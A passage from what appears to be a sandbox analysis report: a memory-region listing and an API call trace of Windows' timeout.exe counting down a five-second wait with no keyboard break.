id = 2189
start_va = 0x75880000
end_va = 0x758cdfff
entry_point = 0x75880000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 2190
start_va = 0x75bc0000
end_va = 0x75c5cfff
entry_point = 0x75bc0000
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 2191
start_va = 0x768c0000
end_va = 0x76916fff
entry_point = 0x768c0000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 2192
start_va = 0x76e60000
end_va = 0x76f00fff
entry_point = 0x76e60000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 2193
start_va = 0x76f10000
end_va = 0x76f15fff
entry_point = 0x76f10000
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 2194
start_va = 0x7f6f0000
end_va = 0x7f7effff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007f6f0000"
filename = ""
Region:
id = 2195
start_va = 0x290000
end_va = 0x357fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000290000"
filename = ""
Region:
id = 2196
start_va = 0x759b0000
end_va = 0x75a7bfff
entry_point = 0x759b0000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 2197
start_va = 0x76e40000
end_va = 0x76e5efff
entry_point = 0x76e40000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2198
start_va = 0xd0000
end_va = 0xd6fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000d0000"
filename = ""
Region:
id = 2199
start_va = 0xe0000
end_va = 0xe1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000e0000"
filename = ""
Region:
id = 2200
start_va = 0xf0000
end_va = 0xf1fff
entry_point = 0xf0000
region_type = mapped_file
name = "timeout.exe.mui"
filename = "\\Windows\\System32\\en-US\\timeout.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\timeout.exe.mui")
Region:
id = 2201
start_va = 0x100000
end_va = 0x100fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000100000"
filename = ""
Region:
id = 2202
start_va = 0x110000
end_va = 0x110fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000110000"
filename = ""
Region:
id = 2203
start_va = 0x400000
end_va = 0x500fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000400000"
filename = ""
Region:
id = 2204
start_va = 0x510000
end_va = 0x110ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000510000"
filename = ""
Region:
id = 2205
start_va = 0x1110000
end_va = 0x13defff
entry_point = 0x1110000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Thread:
id = 215
os_tid = 0xedc
[0080.369] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fcb4 | out: lpSystemTimeAsFileTime=0x16fcb4*(dwLowDateTime=0xe06ea130, dwHighDateTime=0x1d469c7))
[0080.369] GetCurrentProcessId () returned 0xed8
[0080.369] GetCurrentThreadId () returned 0xedc
[0080.369] GetTickCount () returned 0x21ed5
[0080.369] QueryPerformanceCounter (in: lpPerformanceCount=0x16fcac | out: lpPerformanceCount=0x16fcac*=1815431500000) returned 1
[0080.370] GetModuleHandleA (lpModuleName=0x0) returned 0x20000
[0080.370] __set_app_type (_Type=0x1)
[0080.370] __p__fmode () returned 0x757a31f4
[0080.370] __p__commode () returned 0x757a31fc
[0080.370] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x257c5) returned 0x0
[0080.371] __wgetmainargs (in: _Argc=0x27140, _Argv=0x27148, _Env=0x27144, _DoWildCard=0, _StartInfo=0x27154 | out: _Argc=0x27140, _Argv=0x27148, _Env=0x27144) returned 0
[0080.371] SetThreadUILanguage (LangId=0x0) returned 0x409
[0080.371] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
[0080.372] SetLastError (dwErrCode=0x0)
[0080.372] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18
[0080.372] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b
[0080.372] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b
[0080.372] VerifyVersionInfoW (in: lpVersionInformation=0x16f52c, dwTypeMask=0x3, dwlConditionMask=0x1801b | out: lpVersionInformation=0x16f52c) returned 1
[0080.372] lstrlenW (lpString="") returned 0
[0080.373] SetThreadUILanguage (LangId=0x0) returned 0x409
[0080.373] SetLastError (dwErrCode=0x0)
[0080.373] _memicmp (_Buf1=0x19f1e8, _Buf2=0x211e8, _Size=0x7) returned 0
[0080.373] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1a1bf0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\timeout.exe" (normalized: "c:\\windows\\system32\\timeout.exe")) returned 0x1f
[0080.374] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\system32\\timeout.exe", lpdwHandle=0x0 | out: lpdwHandle=0x0) returned 0x76c
[0080.374] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\system32\\timeout.exe", dwHandle=0x0, dwLen=0x776, lpData=0x1a1e00 | out: lpData=0x1a1e00) returned 1
[0080.374] VerQueryValueW (in: pBlock=0x1a1e00, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x16f634, puLen=0x16f638 | out: lplpBuffer=0x16f634*=0x1a21b0, puLen=0x16f638) returned 1
[0080.376] _memicmp (_Buf1=0x19f1e8, _Buf2=0x211e8, _Size=0x7) returned 0
[0080.376] _vsnwprintf (in: _Buffer=0x1a1bf0, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0x16f61c | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37
[0080.376] VerQueryValueW (in: pBlock=0x1a1e00, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0x16f644, puLen=0x16f640 | out: lplpBuffer=0x16f644*=0x1a1fe0, puLen=0x16f640) returned 1
[0080.376] lstrlenW (lpString="timeout.exe") returned 11
[0080.376] lstrlenW (lpString="timeout.exe") returned 11
[0080.376] lstrlenW (lpString=".EXE") returned 4
[0080.376] StrStrIW (lpFirst="timeout.exe", lpSrch=".EXE") returned=".exe"
[0080.377] lstrlenW (lpString="timeout.exe") returned 11
[0080.377] lstrlenW (lpString=".EXE") returned 4
[0080.377] _memicmp (_Buf1=0x19f1e8, _Buf2=0x211e8, _Size=0x7) returned 0
[0080.377] lstrlenW (lpString="timeout") returned 7
[0080.377] _memicmp (_Buf1=0x19f200, _Buf2=0x211e8, _Size=0x7) returned 0
[0080.377] _memicmp (_Buf1=0x19f218, _Buf2=0x211e8, _Size=0x7) returned 0
[0080.377] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x1a28b0, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17
[0080.378] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23
[0080.378] _vsnwprintf (in: _Buffer=0x1a2808, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0x16f620 | out: _Buffer="Type \"TIMEOUT /?\" for usage.") returned 28
[0080.378] SetLastError (dwErrCode=0x0)
[0080.378] GetThreadLocale () returned 0x409
[0080.378] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0080.378] lstrlenW (lpString="?") returned 1
[0080.378] GetThreadLocale () returned 0x409
[0080.378] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0080.378] GetThreadLocale () returned 0x409
[0080.378] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0080.378] lstrlenW (lpString="nobreak") returned 7
[0080.378] SetLastError (dwErrCode=0x0)
[0080.379] SetLastError (dwErrCode=0x0)
[0080.379] lstrlenW (lpString="5") returned 1
[0080.379] SetLastError (dwErrCode=0x490)
[0080.379] SetLastError (dwErrCode=0x0)
[0080.379] lstrlenW (lpString="5") returned 1
[0080.379] StrChrIW (lpStart="5", wMatch=0x3a) returned 0x0
[0080.379] SetLastError (dwErrCode=0x490)
[0080.379] SetLastError (dwErrCode=0x0)
[0080.379] _memicmp (_Buf1=0x19f230, _Buf2=0x211e8, _Size=0x7) returned 0
[0080.379] lstrlenW (lpString="5") returned 1
[0080.379] lstrlenW (lpString="5") returned 1
[0080.379] lstrlenW (lpString=" \x09") returned 2
[0080.379] StrChrW (lpStart=" \x09", wMatch=0x35) returned 0x0
[0080.379] StrChrW (lpStart=" \x09", wMatch=0x35) returned 0x0
[0080.379] GetLastError () returned 0x0
[0080.379] lstrlenW (lpString="5") returned 1
[0080.379] lstrlenW (lpString="5") returned 1
[0080.379] SetLastError (dwErrCode=0x0)
[0080.379] _errno () returned 0x3f07d8
[0080.379] wcstol (in: _String="5", _EndPtr=0x16f848, _Radix=10 | out: _EndPtr=0x16f848*="") returned 5
[0080.379] lstrlenW (lpString="") returned 0
[0080.379] _errno () returned 0x3f07d8
[0080.379] time (in: timer=0x16f864 | out: timer=0x16f864) returned 0x5bcd5fac
[0080.379] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0080.379] GetFileType (hFile=0x3) returned 0x2
[0080.380] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x16f7d8 | out: lpMode=0x16f7d8) returned 1
[0080.380] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0080.380] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x16f854 | out: lpMode=0x16f854) returned 1
[0080.380] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a1) returned 1
[0080.380] GetNumberOfConsoleInputEvents (in: hConsoleInput=0x3, lpNumberOfEvents=0x16f84c | out: lpNumberOfEvents=0x16f84c) returned 1
[0080.381] FlushConsoleInputBuffer (hConsoleInput=0x3) returned 1
[0080.381] _memicmp (_Buf1=0x19f218, _Buf2=0x211e8, _Size=0x7) returned 0
[0080.381] LoadStringW (in: hInstance=0x0, uID=0x98, lpBuffer=0x1a28b0, cchBufferMax=256 | out: lpBuffer="\nWaiting for %*lu") returned 0x11
[0080.381] lstrlenW (lpString="\nWaiting for %*lu") returned 17
[0080.381] _vsnwprintf (in: _Buffer=0x16fa64, _BufferCount=0xfd, _Format="\nWaiting for %*lu", _ArgList=0x16f7dc | out: _Buffer="\nWaiting for 5") returned 14
[0080.381] __iob_func () returned 0x757a2900
[0080.381] _fileno (_File=0x757a2920) returned 1
[0080.381] _errno () returned 0x3f07d8
[0080.381] _get_osfhandle (_FileHandle=1) returned 0x4c
[0080.381] _errno () returned 0x3f07d8
[0080.381] GetFileType (hFile=0x4c) returned 0x2
[0080.381] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0080.381] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x16f7a4 | out: lpMode=0x16f7a4) returned 0
[0080.381] lstrlenW (lpString="\nWaiting for 5") returned 14
[0080.381] GetConsoleOutputCP () returned 0x1b5
[0080.382] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\nWaiting for 5", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14
[0080.382] GetConsoleOutputCP () returned 0x1b5
[0080.382] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\nWaiting for 5", cchWideChar=14, lpMultiByteStr=0x27040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\nWaiting for 5", lpUsedDefaultChar=0x0) returned 14
[0080.382] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 14
[0080.382] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0080.382] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0080.382] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x4c, lpConsoleScreenBufferInfo=0x16f7f0 | out: lpConsoleScreenBufferInfo=0x16f7f0) returned 0
[0080.383] _memicmp (_Buf1=0x19f218, _Buf2=0x211e8, _Size=0x7) returned 0
[0080.383] LoadStringW (in: hInstance=0x0, uID=0xa0, lpBuffer=0x1a28b0, cchBufferMax=256 | out: lpBuffer=" seconds, press a key to continue ...") returned 0x25
[0080.383] lstrlenW (lpString=" seconds, press a key to continue ...") returned 37
[0080.383] __iob_func () returned 0x757a2900
[0080.383] _fileno (_File=0x757a2920) returned 1
[0080.383] _errno () returned 0x3f07d8
[0080.383] _get_osfhandle (_FileHandle=1) returned 0x4c
[0080.383] _errno () returned 0x3f07d8
[0080.383] GetFileType (hFile=0x4c) returned 0x2
[0080.383] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0080.383] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x16f7a4 | out: lpMode=0x16f7a4) returned 0
[0080.383] lstrlenW (lpString=" seconds, press a key to continue ...") returned 37
[0080.383] GetConsoleOutputCP () returned 0x1b5
[0080.383] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr=" seconds, press a key to continue ...", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37
[0080.383] GetConsoleOutputCP () returned 0x1b5
[0080.384] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr=" seconds, press a key to continue ...", cchWideChar=37, lpMultiByteStr=0x27040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" seconds, press a key to continue ...", lpUsedDefaultChar=0x0) returned 37
[0080.384] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 37
[0080.384] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0080.384] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x16f808, nLength=0x2, lpNumberOfEventsRead=0x16f84c | out: lpBuffer=0x16f808, lpNumberOfEventsRead=0x16f84c) returned 1
[0080.384] time (in: timer=0x16f864 | out: timer=0x16f864) returned 0x5bcd5fac
[0080.384] Sleep (dwMilliseconds=0x64)
[0080.489] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x16f808, nLength=0x2, lpNumberOfEventsRead=0x16f84c | out: lpBuffer=0x16f808, lpNumberOfEventsRead=0x16f84c) returned 1
[0080.490] time (in: timer=0x16f864 | out: timer=0x16f864) returned 0x5bcd5fac
[0080.490] Sleep (dwMilliseconds=0x64)
[0080.622] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x16f808, nLength=0x2, lpNumberOfEventsRead=0x16f84c | out: lpBuffer=0x16f808, lpNumberOfEventsRead=0x16f84c) returned 1
[0080.623] time (in: timer=0x16f864 | out: timer=0x16f864) returned 0x5bcd5fac
[0080.623] Sleep (dwMilliseconds=0x64)
[0080.723] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x16f808, nLength=0x2, lpNumberOfEventsRead=0x16f84c | out: lpBuffer=0x16f808, lpNumberOfEventsRead=0x16f84c) returned 1
[0080.723] time (in: timer=0x16f864 | out: timer=0x16f864) returned 0x5bcd5fac
[0080.723] Sleep (dwMilliseconds=0x64)
[0080.832] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x16f808, nLength=0x2, lpNumberOfEventsRead=0x16f84c | out: lpBuffer=0x16f808, lpNumberOfEventsRead=0x16f84c) returned 1
[0080.833] time (in: timer=0x16f864 | out: timer=0x16f864) returned 0x5bcd5fad
[0080.833] _vsnwprintf (in: _Buffer=0x16fa64, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x16f7d8 | out: _Buffer="\x084") returned 2
[0080.833] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0080.833] __iob_func () returned 0x757a2900
[0080.833] _fileno (_File=0x757a2920) returned 1
[0080.833] _errno () returned 0x3f07d8
[0080.833] _get_osfhandle (_FileHandle=1) returned 0x4c
[0080.833] _errno () returned 0x3f07d8
[0080.833] GetFileType (hFile=0x4c) returned 0x2
[0080.833] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0080.833] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x16f7a4 | out: lpMode=0x16f7a4) returned 0
[0080.833] lstrlenW (lpString="\x084") returned 2
[0080.833] GetConsoleOutputCP () returned 0x1b5
[0080.833] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x084", cchWideChar=2, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2
[0080.834] GetConsoleOutputCP () returned 0x1b5
[0080.834] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x084", cchWideChar=2, lpMultiByteStr=0x27040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x084", lpUsedDefaultChar=0x0) returned 2
[0080.834] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 2
[0080.834] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0080.834] Sleep (dwMilliseconds=0x64)
[0080.942] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x16f808, nLength=0x2, lpNumberOfEventsRead=0x16f84c | out: lpBuffer=0x16f808, lpNumberOfEventsRead=0x16f84c) returned 1
[0080.942] time (in: timer=0x16f864 | out: timer=0x16f864) returned 0x5bcd5fad
[0080.942] Sleep (dwMilliseconds=0x64)
[0081.052] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x16f808, nLength=0x2, lpNumberOfEventsRead=0x16f84c | out: lpBuffer=0x16f808, lpNumberOfEventsRead=0x16f84c) returned 1
[0081.052] time (in: timer=0x16f864 | out: timer=0x16f864) returned 0x5bcd5fad
[0081.052] Sleep (dwMilliseconds=0x64)
[0081.160] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x16f808, nLength=0x2, lpNumberOfEventsRead=0x16f84c | out: lpBuffer=0x16f808, lpNumberOfEventsRead=0x16f84c) returned 1
[0081.160] time (in: timer=0x16f864 | out: timer=0x16f864) returned 0x5bcd5fad
[0081.160] Sleep (dwMilliseconds=0x64)
[0081.270] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x16f808, nLength=0x2, lpNumberOfEventsRead=0x16f84c | out: lpBuffer=0x16f808, lpNumberOfEventsRead=0x16f84c) returned 1
[0081.270] time (in: timer=0x16f864 | out: timer=0x16f864) returned 0x5bcd5fad
[0081.270] Sleep (dwMilliseconds=0x64)
[0081.379] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x16f808, nLength=0x2, lpNumberOfEventsRead=0x16f84c | out: lpBuffer=0x16f808, lpNumberOfEventsRead=0x16f84c) returned 1
[0081.380] time (in: timer=0x16f864 | out: timer=0x16f864) returned 0x5bcd5fad
[0081.380] Sleep (dwMilliseconds=0x64)
[0081.488] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x16f808, nLength=0x2, lpNumberOfEventsRead=0x16f84c | out: lpBuffer=0x16f808, lpNumberOfEventsRead=0x16f84c) returned 1
[0081.488] time (in: timer=0x16f864 | out: timer=0x16f864) returned 0x5bcd5fad
[0081.488] Sleep (dwMilliseconds=0x64)
[0081.605] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x16f808, nLength=0x2, lpNumberOfEventsRead=0x16f84c | out: lpBuffer=0x16f808, lpNumberOfEventsRead=0x16f84c) returned 1
[0081.605] time (in: timer=0x16f864 | out: timer=0x16f864) returned 0x5bcd5fad
[0081.605] Sleep (dwMilliseconds=0x64)
[0081.706] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x16f808, nLength=0x2, lpNumberOfEventsRead=0x16f84c | out: lpBuffer=0x16f808, lpNumberOfEventsRead=0x16f84c) returned 1
[0081.706] time (in: timer=0x16f864 | out: timer=0x16f864) returned 0x5bcd5fad
[0081.706] Sleep (dwMilliseconds=0x64)
[0081.815] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x16f808, nLength=0x2, lpNumberOfEventsRead=0x16f84c | out: lpBuffer=0x16f808, lpNumberOfEventsRead=0x16f84c) returned 1
[0081.815] time (in: timer=0x16f864 | out: timer=0x16f864) returned 0x5bcd5fad
[0081.815] Sleep (dwMilliseconds=0x64)
[0081.925] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x16f808, nLength=0x2, lpNumberOfEventsRead=0x16f84c | out: lpBuffer=0x16f808, lpNumberOfEventsRead=0x16f84c) returned 1
[0081.925] time (in: timer=0x16f864 | out: timer=0x16f864) returned 0x5bcd5fae
[0081.925] _vsnwprintf (in: _Buffer=0x16fa64, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x16f7d8 | out: _Buffer="\x083") returned 2
[0081.925] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0081.925] __iob_func () returned 0x757a2900
[0081.925] _fileno (_File=0x757a2920) returned 1
[0081.925] _errno () returned 0x3f07d8
[0081.925] _get_osfhandle (_FileHandle=1) returned 0x4c
[0081.925] _errno () returned 0x3f07d8
[0081.925] GetFileType (hFile=0x4c) returned 0x2
[0081.925] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0081.925] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x16f7a4 | out: lpMode=0x16f7a4) returned 0
[0081.926] lstrlenW (lpString="\x083") returned 2
[0081.926] GetConsoleOutputCP () returned 0x1b5
[0081.926] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x083", cchWideChar=2, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2
[0081.926] GetConsoleOutputCP () returned 0x1b5
[0081.926] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x083", cchWideChar=2, lpMultiByteStr=0x27040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x083", lpUsedDefaultChar=0x0) returned 2
[0081.926] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 2
[0081.926] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0081.926] Sleep (dwMilliseconds=0x64)
[0082.034] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x16f808, nLength=0x2, lpNumberOfEventsRead=0x16f84c | out: lpBuffer=0x16f808, lpNumberOfEventsRead=0x16f84c) returned 1
[0082.034] time (in: timer=0x16f864 | out: timer=0x16f864) returned 0x5bcd5fae
[0082.034] Sleep (dwMilliseconds=0x64)
[0082.143] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x16f808, nLength=0x2, lpNumberOfEventsRead=0x16f84c | out: lpBuffer=0x16f808, lpNumberOfEventsRead=0x16f84c) returned 1
[0082.143] time (in: timer=0x16f864 | out: timer=0x16f864) returned 0x5bcd5fae
[0082.143] Sleep (dwMilliseconds=0x64)
[0082.252] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x16f808, nLength=0x2, lpNumberOfEventsRead=0x16f84c | out: lpBuffer=0x16f808, lpNumberOfEventsRead=0x16f84c) returned 1
[0082.252] time (in: timer=0x16f864 | out: timer=0x16f864) returned 0x5bcd5fae
[0082.252] Sleep (dwMilliseconds=0x64)
[0082.361] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x16f808, nLength=0x2, lpNumberOfEventsRead=0x16f84c | out: lpBuffer=0x16f808, lpNumberOfEventsRead=0x16f84c) returned 1
[0082.361] time (in: timer=0x16f864 | out: timer=0x16f864) returned 0x5bcd5fae
[0082.361] Sleep (dwMilliseconds=0x64)
[0082.471] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x16f808, nLength=0x2, lpNumberOfEventsRead=0x16f84c | out: lpBuffer=0x16f808, lpNumberOfEventsRead=0x16f84c) returned 1
[0082.471] time (in: timer=0x16f864 | out: timer=0x16f864) returned 0x5bcd5fae
[0082.471] Sleep (dwMilliseconds=0x64)
[0082.580] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x16f808, nLength=0x2, lpNumberOfEventsRead=0x16f84c | out: lpBuffer=0x16f808, lpNumberOfEventsRead=0x16f84c) returned 1
[0082.580] time (in: timer=0x16f864 | out: timer=0x16f864) returned 0x5bcd5fae
[0082.580] Sleep (dwMilliseconds=0x64)
[0082.689] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x16f808, nLength=0x2, lpNumberOfEventsRead=0x16f84c | out: lpBuffer=0x16f808, lpNumberOfEventsRead=0x16f84c) returned 1
[0082.689] time (in: timer=0x16f864 | out: timer=0x16f864) returned 0x5bcd5fae
[0082.689] Sleep (dwMilliseconds=0x64)
[0082.800] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x16f808, nLength=0x2, lpNumberOfEventsRead=0x16f84c | out: lpBuffer=0x16f808, lpNumberOfEventsRead=0x16f84c) returned 1
[0082.800] time (in: timer=0x16f864 | out: timer=0x16f864) returned 0x5bcd5fae
[0082.801] Sleep (dwMilliseconds=0x64)
[0082.907] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x16f808, nLength=0x2, lpNumberOfEventsRead=0x16f84c | out: lpBuffer=0x16f808, lpNumberOfEventsRead=0x16f84c) returned 1
[0082.907] time (in: timer=0x16f864 | out: timer=0x16f864) returned 0x5bcd5faf
[0082.907] _vsnwprintf (in: _Buffer=0x16fa64, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x16f7d8 | out: _Buffer="\x082") returned 2
[0082.908] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0082.908] __iob_func () returned 0x757a2900
[0082.908] _fileno (_File=0x757a2920) returned 1
[0082.908] _errno () returned 0x3f07d8
[0082.908] _get_osfhandle (_FileHandle=1) returned 0x4c
[0082.908] _errno () returned 0x3f07d8
[0082.908] GetFileType (hFile=0x4c) returned 0x2
[0082.908] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0082.908] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x16f7a4 | out: lpMode=0x16f7a4) returned 0
[0082.908] lstrlenW (lpString="\x082") returned 2
[0082.908] GetConsoleOutputCP () returned 0x1b5
[0082.908] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x082", cchWideChar=2, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2
[0082.908] GetConsoleOutputCP () returned 0x1b5
[0082.908] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x082", cchWideChar=2, lpMultiByteStr=0x27040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x082", lpUsedDefaultChar=0x0) returned 2
[0082.908] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 2
[0082.909] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0082.909] Sleep (dwMilliseconds=0x64)
[0083.016] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x16f808, nLength=0x2, lpNumberOfEventsRead=0x16f84c | out: lpBuffer=0x16f808, lpNumberOfEventsRead=0x16f84c) returned 1
[0083.017] time (in: timer=0x16f864 | out: timer=0x16f864) returned 0x5bcd5faf
[0083.017] Sleep (dwMilliseconds=0x64)
[0083.126] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x16f808, nLength=0x2, lpNumberOfEventsRead=0x16f84c | out: lpBuffer=0x16f808, lpNumberOfEventsRead=0x16f84c) returned 1
[0083.126] time (in: timer=0x16f864 | out: timer=0x16f864) returned 0x5bcd5faf
[0083.126] Sleep (dwMilliseconds=0x64)
[0083.235] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x16f808, nLength=0x2, lpNumberOfEventsRead=0x16f84c | out: lpBuffer=0x16f808, lpNumberOfEventsRead=0x16f84c) returned 1
